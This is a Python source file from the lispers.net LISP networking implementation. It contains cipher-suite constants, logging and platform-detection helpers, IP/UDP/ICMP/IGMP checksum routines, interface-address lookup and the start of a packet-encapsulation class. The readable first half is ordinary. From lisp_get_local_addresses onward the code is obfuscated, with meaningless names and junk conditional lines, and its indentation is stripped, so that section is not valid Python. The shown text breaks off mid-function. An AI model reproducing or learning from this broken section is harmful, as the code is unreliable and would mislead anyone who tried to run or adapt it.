LISP_ICMP_TOO_BIG_RATE_LIMIT = 1

LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180

LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF

LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF

LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3

LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF

LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6

LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)

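#
# LISP_USE_CHACHA and LISP_USE_POLY are runtime environment-variable
# toggles; presumably they steer cipher selection (ChaCha20) and keyed
# authentication (Poly1305) elsewhere in this file.
#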
def lisp_record_traceback(*args):
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
    fd = open("./logs/lisp-traceback.log", "a")
    fd.write("---------- Exception occurred: {} ----------\n".format(ts))
    try:
        traceback.print_last(file=fd)
    except:
        fd.write("traceback.print_last(file=fd) failed")

    try:
        traceback.print_last()
    except:
        print("traceback.print_last() failed")

    fd.close()
    return

def lisp_set_exception():
    sys.excepthook = lisp_record_traceback
    return

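# Note: sys.excepthook handlers are invoked with (type, value, traceback);
# lisp_record_traceback() absorbs those via *args and does not use them,
# relying on traceback.print_last() to render the exception instead.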
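#
# Platform-detection helpers. Each returns a boolean describing the distro,
# OS, CPU architecture, cloud environment, or Python version the process is
# running on.
#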
def lisp_is_raspbian():
    if (distro.linux_distribution()[0] != "debian"): return (False)
    return (platform.machine() in ["armv6l", "armv7l"])

def lisp_is_ubuntu():
    return (distro.linux_distribution()[0] == "Ubuntu")

def lisp_is_fedora():
    return (distro.linux_distribution()[0] == "fedora")

def lisp_is_centos():
    return (distro.linux_distribution()[0] == "centos")

def lisp_is_debian():
    return (distro.linux_distribution()[0] == "debian")

def lisp_is_debian_kali():
    return (distro.linux_distribution()[0] == "Kali")

def lisp_is_macos():
    return (platform.uname()[0] == "Darwin")

def lisp_is_alpine():
    return (os.path.exists("/etc/alpine-release"))

def lisp_is_x86():
    machine = platform.machine()
    return (machine in ("x86", "i686", "x86_64"))

def lisp_is_linux():
    return (platform.uname()[0] == "Linux")

def lisp_is_python2():
    version = sys.version.split()[0]
    return (version[0:3] == "2.7")

def lisp_is_python3():
    version = sys.version.split()[0]
    return (version[0:2] == "3.")

def lisp_on_aws():
    vendor = getoutput("sudo dmidecode -s bios-vendor")
    if (vendor.find("command not found") != -1 and lisp_on_docker()):
        aws_check = bold("AWS check", False)
        lprint("{} - dmidecode not installed in docker container".format(aws_check))
    return (vendor.lower().find("amazon") != -1)

def lisp_on_gcp():
    version = getoutput("sudo dmidecode -s bios-version")
    return (version.lower().find("google") != -1)

def lisp_on_docker():
    return (os.path.exists("/.dockerenv"))

def lisp_process_logfile():
    logfile = "./logs/lisp-{}.log".format(lisp_log_id)
    if (os.path.exists(logfile)): return

    sys.stdout.close()
    sys.stdout = open(logfile, "a")

    lisp_print_banner(bold("logfile rotation", False))
    return

def lisp_i_am(name):
    global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
    global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
    global lisp_hostname

    lisp_log_id = name
    if (name == "itr"): lisp_i_am_itr = True
    if (name == "etr"): lisp_i_am_etr = True
    if (name == "rtr"): lisp_i_am_rtr = True
    if (name == "mr"): lisp_i_am_mr = True
    if (name == "ms"): lisp_i_am_ms = True
    if (name == "ddt"): lisp_i_am_ddt = True
    if (name == "core"): lisp_i_am_core = True

    lisp_hostname = socket.gethostname()
    index = lisp_hostname.find(".")
    if (index != -1): lisp_hostname = lisp_hostname[0:index]
    return

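# Illustrative startup usage: each lispers.net component calls lisp_i_am()
# once with its role name, e.g. lisp_i_am("itr"), which sets the role flag,
# the log id used in logfile names, and the short (undotted) hostname.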
def lprint(*args):
    force = ("force" in args)
    if (lisp_debug_logging == False and force == False): return

    lisp_process_logfile()
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]
    print("{}: {}:".format(ts, lisp_log_id), end=" ")

    for arg in args:
        if (arg == "force"): continue
        print(arg, end=" ")
    print()

    try: sys.stdout.flush()
    except: pass
    return

def fprint(*args):
    forced_args = args + ("force",)
    lprint(*forced_args)
    return

def dprint(*args):
    if (lisp_data_plane_logging): lprint(*args)
    return

def debug(*args):
    lisp_process_logfile()

    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]

    print(red(">>>", False), end=" ")
    print("{}:".format(ts), end=" ")
    for arg in args: print(arg, end=" ")
    print(red("<<<\n", False))
    try: sys.stdout.flush()
    except: pass
    return

def lisp_print_caller():
    fprint(traceback.print_last())

def lisp_print_banner(string):
    global lisp_version, lisp_hostname

    if (lisp_version == ""):
        lisp_version = getoutput("cat lisp-version.txt")

    hostname = bold(lisp_hostname, False)
    lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
        datetime.datetime.now(), lisp_version, hostname))
    return

def green(string, html):
    if (html): return ('<font color="green"><b>{}</b></font>'.format(string))
    return (bold("\033[92m" + string + "\033[0m", html))

def green_last_sec(string):
    return (green(string, True))

def green_last_min(string):
    return ('<font color="#58D68D"><b>{}</b></font>'.format(string))

def red(string, html):
    if (html): return ('<font color="red"><b>{}</b></font>'.format(string))
    return (bold("\033[91m" + string + "\033[0m", html))

def blue(string, html):
    if (html): return ('<font color="blue"><b>{}</b></font>'.format(string))
    return (bold("\033[94m" + string + "\033[0m", html))

def bold(string, html):
    if (html): return ("<b>{}</b>".format(string))
    return ("\033[1m" + string + "\033[0m")

def convert_font(string):
    # Scan for ANSI color/bold markers and rewrite each marked substring
    # with the equivalent HTML produced by red()/green()/blue()/bold().
    fonts = [["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold]]
    end_marker = "[0m"

    for font in fonts:
        marker = font[0]
        font_func = font[1]
        marker_len = len(marker)
        index = string.find(marker)
        if (index != -1): break

    while (index != -1):
        end_index = string[index::].find(end_marker)
        substring = string[index + marker_len:index + end_index]
        string = string[:index] + font_func(substring, True) + \
            string[index + end_index + marker_len::]
        index = string.find(marker)

    # A bold span nested inside a color span needs another pass.
    if (string.find("[1m") != -1): string = convert_font(string)
    return (string)

def lisp_space(num):
    output = ""
    for i in range(num): output += " "
    return (output)

def lisp_button(string, url):
    button_style = '<button style="background-color:transparent;border-radius:10px; ' + 'type="button">'

    if (url == None):
        button = button_style + string + "</button>"
    else:
        anchor = '<a href="{}">'.format(url)
        spacer = lisp_space(2)
        button = spacer + anchor + button_style + string + "</button></a>" + spacer

    return (button)

def lisp_print_cour(string):
    output = '<font face="Courier New">{}</font>'.format(string)
    return (output)

def lisp_print_sans(string):
    output = '<font face="Sans-Serif">{}</font>'.format(string)
    return (output)

def lisp_span(string, hover_string):
    output = '<span title="{}">{}</span>'.format(hover_string, string)
    return (output)

def lisp_eid_help_hover(output):
    eid_help = '''Unicast EID format:
    For longest match lookups:
      <address> or [<iid>]<address>
    For exact match lookups:
      <prefix> or [<iid>]<prefix>
Multicast EID format:
    For longest match lookups:
      <address>-><group> or
      [<iid>]<address>->[<iid>]<group>'''

    hover = lisp_span(output, eid_help)
    return (hover)

def lisp_geo_help_hover(output):
    geo_help = '''EID format:
    <address> or [<iid>]<address>
    '<name>' or [<iid>]'<name>'
Geo-Point format:
    d-m-s-<N|S>-d-m-s-<W|E> or
    [<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
    d-m-s-<N|S>-d-m-s-<W|E>/<km> or
    [<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''

    hover = lisp_span(output, geo_help)
    return (hover)

def space(num):
    output = ""
    for i in range(num): output += " "
    return (output)

def lisp_get_ephemeral_port():
    return (random.randrange(32768, 65535))

def lisp_get_data_nonce():
    return (random.randint(0, 0xffffff))

def lisp_get_control_nonce():
    return (random.randint(0, (2 ** 64) - 1))

def lisp_hex_string(integer_value):
    hex_string = hex(integer_value)[2::]
    if (hex_string[-1] == "L"): hex_string = hex_string[0:-1]
    return (hex_string)

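# The trailing-"L" strip handles Python 2, where hex() of a long ended in
# "L" (e.g. hex(2**64) == "0x10000000000000000L"); Python 3 never emits it.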
def lisp_get_timestamp():
    return (time.time())

def lisp_set_timestamp(seconds):
    return (time.time() + seconds)

def lisp_print_elapsed(ts):
    if (ts == 0 or ts == None): return ("never")
    elapsed = time.time() - ts
    elapsed = round(elapsed, 0)
    return (str(datetime.timedelta(seconds=elapsed)))

def lisp_print_future(ts):
    if (ts == 0): return ("never")
    future = ts - time.time()
    if (future < 0): return ("expired")
    future = round(future, 0)
    return (str(datetime.timedelta(seconds=future)))

def lisp_print_eid_tuple(eid, group):
    eid_str = eid.print_prefix()
    if (group.is_null()): return (eid_str)

    group_str = group.print_prefix()
    iid = group.instance_id

    if (eid.is_null() or eid.is_exact_match(group)):
        index = group_str.find("]") + 1
        return ("[{}](*, {})".format(iid, group_str[index::]))

    sg_str = eid.print_sg(group)
    return (sg_str)

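# Illustrative output (assumed values): a (*, G) entry with instance-id 1000
# and group 224.1.1.1/32 prints as "[1000](*, 224.1.1.1/32)"; an (S, G)
# entry is rendered by eid.print_sg(group) instead.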
def lisp_convert_6to4(addr_str):
    if (addr_str.find("::ffff:") == -1): return (addr_str)
    addr = addr_str.split(":")
    return (addr[-1])

def lisp_convert_4to6(addr_str):
    addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
    addr.store_address(addr_str)
    return (addr)

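# "::ffff:a.b.c.d" is the IPv4-mapped IPv6 form (RFC 4291); these two
# helpers convert between that form and a plain dotted-quad string.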
def lisp_gethostbyname(string):
    ipv4 = string.split(".")
    ipv6 = string.split(":")
    mac = string.split("-")

    # Already a dotted-quad IPv4 address, return it unchanged.
    if (len(ipv4) == 4):
        if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
            ipv4[3].isdigit()): return (string)

    # Already an IPv6 address, return it unchanged.
    if (len(ipv6) > 1):
        try:
            int(ipv6[0], 16)
            return (string)
        except:
            pass

    # MAC-address syntax check; falls through to the DNS lookup below.
    if (len(mac) == 3):
        for i in range(3):
            try: int(mac[i], 16)
            except: break

    try:
        addr = socket.gethostbyname(string)
        return (addr)
    except:
        if (lisp_is_alpine() == False): return ("")

    # On Alpine, fall back to getaddrinfo(); reject the result if the
    # canonical name does not match what was asked for.
    try:
        addr = socket.getaddrinfo(string, 0)[0]
        if (addr[3] != string): return ("")
        addr = addr[4][0]
    except:
        addr = ""

    return (addr)

def lisp_ip_checksum(data, hdrlen=20):
    if (len(data) < hdrlen):
        lprint("IPv4 packet too short, length {}".format(len(data)))
        return (data)

    hexdata = binascii.hexlify(data)

    checksum = 0
    for i in range(0, hdrlen * 2, 4):
        checksum += int(hexdata[i:i+4], 16)

    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    checksum = struct.pack("H", checksum)
    packet = data[0:10] + checksum + data[12::]
    return (packet)

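# Minimal usage sketch (hypothetical values, not from the original code):
# build a 20-byte IPv4 header with a zeroed checksum field and let
# lisp_ip_checksum() fill in bytes 10-11:
#
#   header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 17, 0,
#       socket.inet_aton("10.0.0.1"), socket.inet_aton("10.0.0.2"))
#   header = lisp_ip_checksum(header)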
def lisp_icmp_checksum(data):
    if (len(data) < 36):
        lprint("ICMP packet too short, length {}".format(len(data)))
        return (data)

    hexdata = binascii.hexlify(data)

    checksum = 0
    for i in range(0, 36, 4):
        checksum += int(hexdata[i:i+4], 16)

    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    checksum = struct.pack("H", checksum)
    packet = data[0:2] + checksum + data[4::]
    return (packet)

def lisp_udp_checksum(source, dest, data):
    # Build the IPv6 pseudo-header: source and dest addresses, UDP length,
    # and next-header (the UDP protocol number).
    source_addr = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
    dest_addr = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
    udp_length = socket.htonl(len(data))
    next_header = socket.htonl(LISP_UDP_PROTOCOL)
    pseudo_header = source_addr.pack_address()
    pseudo_header += dest_addr.pack_address()
    pseudo_header += struct.pack("II", udp_length, next_header)

    # Pad the hex string to a multiple of 4 nibbles (16-bit words).
    udp = binascii.hexlify(pseudo_header + data)
    padding = len(udp) % 4
    for i in range(0, padding): udp += "0"

    checksum = 0
    for i in range(0, len(udp), 4):
        checksum += int(udp[i:i+4], 16)

    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    # Store the checksum in the UDP header (bytes 6-7).
    checksum = struct.pack("H", checksum)
    udp = data[0:6] + checksum + data[8::]
    return (udp)

def lisp_igmp_checksum(igmp):
    hexdata = binascii.hexlify(igmp)

    checksum = 0
    for i in range(0, 24, 4):
        checksum += int(hexdata[i:i+4], 16)

    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    checksum = struct.pack("H", checksum)
    igmp = igmp[0:2] + checksum + igmp[4::]
    return (igmp)

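# The IP, ICMP, UDP, and IGMP routines above all share the same 16-bit
# one's-complement fold. A common helper could factor that out -- a sketch
# under that assumption, not part of the original code:
#
#   def ones_complement_checksum(hexdata, length):
#       csum = 0
#       for i in range(0, length, 4):
#           csum += int(hexdata[i:i+4], 16)
#       csum = (csum >> 16) + (csum & 0xffff)
#       csum += csum >> 16
#       return (socket.htons(~csum & 0xffff))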
def lisp_get_interface_address(device):
    if (device not in netifaces.interfaces()): return (None)

    addresses = netifaces.ifaddresses(device)
    if (netifaces.AF_INET not in addresses): return (None)

    return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)

    for addr in addresses[netifaces.AF_INET]:
        addr_str = addr["addr"]
        return_address.store_address(addr_str)
        return (return_address)

    return (None)

def lisp_get_input_interface(packet):
    macs = lisp_format_packet(packet[0:12]).replace(" ", "")
    dest_mac = macs[0:12]
    source_mac = macs[12::]

    try: my_sa = (source_mac in lisp_mymacs)
    except: my_sa = False

    if (dest_mac in lisp_mymacs): return (lisp_mymacs[dest_mac], source_mac, dest_mac, my_sa)
    if (my_sa): return (lisp_mymacs[source_mac], source_mac, dest_mac, my_sa)
    return (["?"], source_mac, dest_mac, my_sa)

def lisp_get_local_interfaces():
    for device in netifaces.interfaces():
        interface = lisp_interface(device)
        interface.add_interface()
    return

def lisp_get_loopback_address():
    for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
        if (addr["peer"] == "127.0.0.1"): continue
        return (addr["peer"])
    return (None)

def lisp_is_mac_string(mac_str):
    mac = mac_str.split("/")
    if (len(mac) == 2): mac_str = mac[0]
    return (len(mac_str) == 14 and mac_str.count("-") == 2)

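# A 14-character string with two dashes matches the "xxxx-xxxx-xxxx" MAC
# notation this code uses; an optional "/<len>" suffix is stripped first.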
def lisp_get_local_macs():
    for device in netifaces.interfaces():
        # Strip ":" and "-" so names like "eth0:1" and "br-lan" pass the
        # isalnum() check below; skip names with other punctuation.
        name = device.replace(":", "")
        name = name.replace("-", "")
        if (name.isalnum() == False): continue

        # Some interfaces raise an exception when queried.
        try:
            parms = netifaces.ifaddresses(device)
        except:
            continue

        if (netifaces.AF_LINK not in parms): continue
        mac = parms[netifaces.AF_LINK][0]["addr"]
        mac = mac.replace(":", "")

        # Skip interfaces with short or malformed hardware addresses.
        if (len(mac) < 12): continue

        if (mac not in lisp_mymacs): lisp_mymacs[mac] = []
        lisp_mymacs[mac].append(device)

    lprint("Local MACs are: {}".format(lisp_mymacs))
    return

def lisp_get_local_rloc():
    # Find the interface the default route points at.
    out = getoutput("netstat -rn | egrep 'default|0.0.0.0'")
    if (out == ""): return (lisp_address(LISP_AFI_IPV4, "", 32, 0))

    out = out.split("\n")[0]
    device = out.split()[-1]

    macos = lisp_is_macos()
    if (macos):
        out = getoutput("ifconfig {} | egrep 'inet '".format(device))
        if (out == ""): return (lisp_address(LISP_AFI_IPV4, "", 32, 0))
    else:
        cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
        out = getoutput(cmd)
        if (out == ""):
            cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
            out = getoutput(cmd)
        if (out == ""): return (lisp_address(LISP_AFI_IPV4, "", 32, 0))

    # Return the first IPv4 address listed for the device.
    out = out.split("\n")
    for line in out:
        address = line.split()[1]
        if (macos == False): address = address.split("/")[0]
        return (lisp_address(LISP_AFI_IPV4, address, 32, 0))

    return (lisp_address(LISP_AFI_IPV4, "", 32, 0))

def lisp_get_local_addresses ( ) :
global lisp_myrlocs
if 89 - 89: OoooooooOO . iIii1I11I1II1 . Oo0Ooo * iIii1I11I1II1 - I1Ii111
if 92 - 92: OoooooooOO - I1ii11iIi11i - OoooooooOO % I1IiiI % I1IiiI % iIii1I11I1II1
if 92 - 92: iII111i * O0 % I1Ii111 . iIii1I11I1II1
if 66 - 66: I11i + Ii1I
if 48 - 48: I1ii11iIi11i
if 96 - 96: ooOoO0o . OoooooooOO
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
OoO000oo000o0 = None
OOOooo0OooOoO = 1
i1Ii1I1Ii11iI = os . getenv ( "LISP_ADDR_SELECT" )
if ( i1Ii1I1Ii11iI != None and i1Ii1I1Ii11iI != "" ) :
i1Ii1I1Ii11iI = i1Ii1I1Ii11iI . split ( ":" )
if ( len ( i1Ii1I1Ii11iI ) == 2 ) :
OoO000oo000o0 = i1Ii1I1Ii11iI [ 0 ]
OOOooo0OooOoO = i1Ii1I1Ii11iI [ 1 ]
else :
if ( i1Ii1I1Ii11iI [ 0 ] . isdigit ( ) ) :
OOOooo0OooOoO = i1Ii1I1Ii11iI [ 0 ]
else :
OoO000oo000o0 = i1Ii1I1Ii11iI [ 0 ]
if 8 - 8: I1ii11iIi11i
if 82 - 82: OoooooooOO
OOOooo0OooOoO = 1 if ( OOOooo0OooOoO == "" ) else int ( OOOooo0OooOoO )
if 75 - 75: II111iiii % I1IiiI + OOooOOo % OoooooooOO / IiII
if 4 - 4: i11iIiiIii - OOooOOo % I1ii11iIi11i * I1Ii111 % o0oOOo0O0Ooo
o0O = [ None , None , None ]
oOoo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
O0OoO0o0Oooo = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
Ooo0oOOoo0O = None
for OoO0 in netifaces . interfaces ( ) :
if ( OoO000oo000o0 != None and OoO000oo000o0 != OoO0 ) : continue
O00Oo = netifaces . ifaddresses ( OoO0 )
if ( O00Oo == { } ) : continue
Ooo0oOOoo0O = lisp_get_interface_instance_id ( OoO0 , None )
if ( netifaces . AF_INET in O00Oo ) :
ooooo0Oo0 = O00Oo [ netifaces . AF_INET ]
IiI = 0
for oOOOo0o in ooooo0Oo0 :
oOoo . store_address ( oOOOo0o [ "addr" ] )
if ( oOoo . is_ipv4_loopback ( ) ) : continue
if ( oOoo . is_ipv4_link_local ( ) ) : continue
if ( oOoo . address == 0 ) : continue
IiI += 1
oOoo . instance_id = Ooo0oOOoo0O
if ( OoO000oo000o0 == None and
lisp_db_for_lookups . lookup_cache ( oOoo , False ) ) : continue
o0O [ 0 ] = oOoo
if ( IiI == OOOooo0OooOoO ) : break
if ( netifaces . AF_INET6 in O00Oo ) :
o0I1IIIi11ii11 = O00Oo [ netifaces . AF_INET6 ]
IiI = 0
for oOOOo0o in o0I1IIIi11ii11 :
Oo0o = oOOOo0o [ "addr" ]
O0OoO0o0Oooo . store_address ( Oo0o )
if ( O0OoO0o0Oooo . is_ipv6_string_link_local ( Oo0o ) ) : continue
if ( O0OoO0o0Oooo . is_ipv6_loopback ( ) ) : continue
IiI += 1
O0OoO0o0Oooo . instance_id = Ooo0oOOoo0O
if ( OoO000oo000o0 == None and
lisp_db_for_lookups . lookup_cache ( O0OoO0o0Oooo , False ) ) : continue
o0O [ 1 ] = O0OoO0o0Oooo
if ( IiI == OOOooo0OooOoO ) : break
if ( o0O [ 0 ] == None ) : continue
o0O [ 2 ] = OoO0
break
III = o0O [ 0 ] . print_address_no_iid ( ) if o0O [ 0 ] else "none"
I1I = o0O [ 1 ] . print_address_no_iid ( ) if o0O [ 1 ] else "none"
OoO0 = o0O [ 2 ] if o0O [ 2 ] else "none"
OoO000oo000o0 = " (user selected)" if OoO000oo000o0 != None else ""
III = red ( III , False )
I1I = red ( I1I , False )
OoO0 = bold ( OoO0 , False )
lprint ( "Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}" . format ( III , I1I , OoO0 , OoO000oo000o0 , Ooo0oOOoo0O ) )
lisp_myrlocs = o0O
return ( ( o0O [ 0 ] != None ) )
def lisp_get_all_addresses ( ) :
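 """Return every usable IPv4 and IPv6 address on this system, skipping loopback and IPv6 link-local addresses."""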
o00oOoo0o00 = [ ]
for i1i1111I in netifaces . interfaces ( ) :
try : iIiiI11II11i = netifaces . ifaddresses ( i1i1111I )
except : continue
if ( netifaces . AF_INET in iIiiI11II11i ) :
for oOOOo0o in iIiiI11II11i [ netifaces . AF_INET ] :
OoOOOO = oOOOo0o [ "addr" ]
if ( OoOOOO . find ( "127.0.0.1" ) != - 1 ) : continue
o00oOoo0o00 . append ( OoOOOO )
if ( netifaces . AF_INET6 in iIiiI11II11i ) :
for oOOOo0o in iIiiI11II11i [ netifaces . AF_INET6 ] :
OoOOOO = oOOOo0o [ "addr" ]
if ( OoOOOO == "::1" ) : continue
if ( OoOOOO [ 0 : 5 ] == "fe80:" ) : continue
o00oOoo0o00 . append ( OoOOOO )
return ( o00oOoo0o00 )
def lisp_get_all_multicast_rles ( ) :
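 """Scan ./lisp.config for "rle-address =" lines and return the values that are IPv4 multicast groups (first octet 224-239), skipping commented lines."""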
o0OOo0O = [ ]
O0O0 = getoutput ( 'egrep "rle-address =" ./lisp.config' )
if ( O0O0 == "" ) : return ( o0OOo0O )
Ii11I1I11II = O0O0 . split ( "\n" )
for i11 in Ii11I1I11II :
if ( i11 [ 0 ] == "#" ) : continue
IIiiiI = i11 . split ( "rle-address = " ) [ 1 ]
oO0Oooo0OoO = int ( IIiiiI . split ( "." ) [ 0 ] )
if ( oO0Oooo0OoO >= 224 and oO0Oooo0OoO < 240 ) : o0OOo0O . append ( IIiiiI )
return ( o0OOo0O )
class lisp_packet ( object ) :
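 """A LISP data-plane packet: the inner packet plus outer IP/UDP/LISP encapsulation state used for encap, decap, and crypto."""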
def __init__ ( self , packet ) :
self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_tos = 0
self . outer_ttl = 0
self . udp_sport = 0
self . udp_dport = 0
self . udp_length = 0
self . udp_checksum = 0
self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_sport = 0
self . inner_dport = 0
self . lisp_header = lisp_data_header ( )
self . packet = packet
self . inner_version = 0
self . outer_version = 0
self . encap_port = LISP_DATA_PORT
self . inner_is_fragment = False
self . packet_error = ""
self . gleaned_dest = False
def encode ( self , nonce ) :
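  """Build the LISP, UDP, and outer IP headers in front of self.packet, choosing or echoing a nonce and encrypting the payload when data-plane security is on and a key exists for the destination RLOC. Returns self, or None when no outer source is set or the outer version is unsupported."""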
if ( self . outer_source . is_null ( ) ) : return ( None )
if ( nonce == None ) :
self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
self . lisp_header . request_nonce ( nonce )
else :
self . lisp_header . nonce ( nonce )
self . lisp_header . instance_id ( self . inner_dest . instance_id )
self . lisp_header . key_id ( 0 )
oOoO000 = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
if ( lisp_data_plane_security and oOoO000 == False ) :
Oo0o = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
if ( Oo0o in lisp_crypto_keys_by_rloc_encap ) :
O0o0O0 = lisp_crypto_keys_by_rloc_encap [ Oo0o ]
if ( O0o0O0 [ 1 ] ) :
O0o0O0 [ 1 ] . use_count += 1
OO0Oo00OO0oo , oOO00o0O0 = self . encrypt ( O0o0O0 [ 1 ] , Oo0o )
if ( oOO00o0O0 ) : self . packet = OO0Oo00OO0oo
self . udp_checksum = 0
if ( self . encap_port == LISP_DATA_PORT ) :
if ( lisp_crypto_ephem_port == None ) :
if ( self . gleaned_dest ) :
self . udp_sport = LISP_DATA_PORT
else :
self . hash_packet ( )
else :
self . udp_sport = lisp_crypto_ephem_port
else :
self . udp_sport = LISP_DATA_PORT
self . udp_dport = self . encap_port
self . udp_length = len ( self . packet ) + 16
iiI1iiIiiiI1I = socket . htons ( self . udp_sport )
i111I1 = socket . htons ( self . udp_dport )
OOOo0Oo0O = socket . htons ( self . udp_length )
Ii1iiI1 = struct . pack ( "HHHH" , iiI1iiIiiiI1I , i111I1 , OOOo0Oo0O , self . udp_checksum )
oOoOO0O00o = self . lisp_header . encode ( )
if ( self . outer_version == 4 ) :
o000o0o00Oo = socket . htons ( self . udp_length + 20 )
oo0O00o0O0Oo = socket . htons ( 0x4000 )
iii11 = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , o000o0o00Oo , 0xdfdf ,
oo0O00o0O0Oo , self . outer_ttl , 17 , 0 )
iii11 += self . outer_source . pack_address ( )
iii11 += self . outer_dest . pack_address ( )
iii11 = lisp_ip_checksum ( iii11 )
elif ( self . outer_version == 6 ) :
iii11 = b""
else :
return ( None )
self . packet = iii11 + Ii1iiI1 + oOoOO0O00o + self . packet
return ( self )
def cipher_pad ( self , packet ) :
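  """Space-pad the packet to a multiple of 16 bytes so block ciphers can process it."""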
iI = len ( packet )
if ( ( iI % 16 ) != 0 ) :
o00ooO000Oo00 = ( old_div ( iI , 16 ) + 1 ) * 16
packet = packet . ljust ( o00ooO000Oo00 )
return ( packet )
def encrypt ( self , key , addr_str ) :
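  """Encrypt self.packet with the negotiated key (chacha20, AES-GCM, or AES-CBC), append the ICV, and return [iv + ciphertext + icv, True]; returns [self.packet, False] when there is no shared key or encryption fails."""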
if ( key == None or key . shared_key == None ) :
return ( [ self . packet , False ] )
OO0Oo00OO0oo = self . cipher_pad ( self . packet )
iI1ii = key . get_iv ( )
i1 = lisp_get_timestamp ( )
iIIiI = None
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
O0O0O0OO00oo = chacha . ChaCha ( key . encrypt_key , iI1ii ) . encrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
I11IIIIiI1 = binascii . unhexlify ( key . encrypt_key )
try :
o0oOOO = AES . new ( I11IIIIiI1 , AES . MODE_GCM , iI1ii )
O0O0O0OO00oo = o0oOOO . encrypt
iIIiI = o0oOOO . digest
except :
